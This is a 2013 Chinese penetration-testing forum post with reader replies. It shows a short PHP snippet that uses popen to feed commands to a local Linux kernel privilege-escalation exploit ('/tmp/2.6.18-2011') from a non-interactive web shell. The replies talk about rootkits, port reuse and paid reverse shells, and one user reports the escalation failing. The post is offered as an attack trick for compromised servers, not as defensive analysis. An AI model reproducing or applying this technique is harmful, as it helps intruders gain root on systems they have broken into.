PHP 非交互式执行交互式命令

2013-12-02 23:13:17 55 Cond0r 6322 1

提权转发不出来
只能出此下策
shell可以用except来执行交互命令
python 也有pexcept模块
perl也有except模块
但是默认不安装
咱们还是用牛逼的php吧
我就不解释了看懂的人自然就懂了
代码

<?php

$sucommand = "/tmp/2.6.18-2011";

$fp = popen($sucommand ,"w");

@fputs($fp,"echo 22222 > /tmp/sbsbsbsbsbsb11111");

@pclose($fp);

?>

再补一张图

类别渗透测试

关于作者

Cond0r136篇文章1277篇回复

Cond0r

评论55次

要评论？请先登录或注册

35楼

kemaelded
2013-12-12 17:24

恩，条条大路通罗马。

回复|@ta|踩(0)|顶(0)
34楼

shanjie89
2013-12-12 14:04

好东西，不错，支持一个

回复|@ta|踩(0)|顶(0)
33楼

yzx65
2013-12-12 09:12

好办法，mark，有没交互式的。

回复|@ta|踩(0)|顶(0)
32楼

gogata
2013-12-11 22:12

mark。。。。

回复|@ta|踩(0)|顶(0)
31楼

booker
2013-12-8 20:54

没看明白

回复|@ta|踩(0)|顶(0)
30楼

lostwolf
2013-12-8 03:20

很好点思路

回复|@ta|踩(0)|顶(0)
29楼

147111
2013-12-6 22:05

收藏一下感谢

回复|@ta|踩(0)|顶(0)
28楼

loversorry
2013-12-6 15:33

和python的popen一样

回复|@ta|踩(0)|顶(0)
27楼

pirate
2013-12-6 09:52

看起来很厉害的样子

回复|@ta|踩(0)|顶(0)
26楼

hicams
2013-12-5 18:13

要是只支持jsp怎么办？私,,,

回复|@ta|踩(0)|顶(0)
25楼

飞云小哥哥
2013-12-4 22:08

感谢分享！！

回复|@ta|踩(0)|顶(0)
24楼

myloveye
2013-12-4 21:20

学xi了方法很好

回复|@ta|踩(0)|顶(0)
23楼

chovil
2013-12-4 13:01

@anlfi 这个想法难道就是传说中的应用层ROOTKIT？

回复|@ta|踩(0)|顶(0)
22楼

risi
2013-12-4 11:15

大牛。有木有jsp下执行的？ jsp非交互式执行交互式命令提权

回复|@ta|踩(0)|顶(0)
21楼

tmdsb
2013-12-4 10:13

mark.........

回复|@ta|踩(0)|顶(0)
20楼

liuda
2013-12-3 22:11

这个得收藏啊

回复|@ta|踩(0)|顶(0)
19楼

kolya
2013-12-3 21:38

测试了下不知道提权没成功还是怎么权限还是apache 悲催啊

回复|@ta|踩(0)|顶(0)
18楼

Cond0r
2013-12-3 20:44

复用你可以考虑apache的mod之类的~~

回复|@ta|踩(0)|顶(0)
17楼

妖妖灵
2013-12-3 18:50

他能给你推荐出端口复用的已经很不错了反弹？有也是最少几万RBM一个。我想想不会掉下5万

回复|@ta|踩(0)|顶(0)
16楼

注册用户
2013-12-3 17:54

。。。就是不知道有神马好用的ROOTKIT。。求推荐。。如果不能反弹，估计多半只能复用了。偶对LINUX搞得少，确实不知道有神马好用的ROOTKIT。

回复|@ta|踩(0)|顶(0)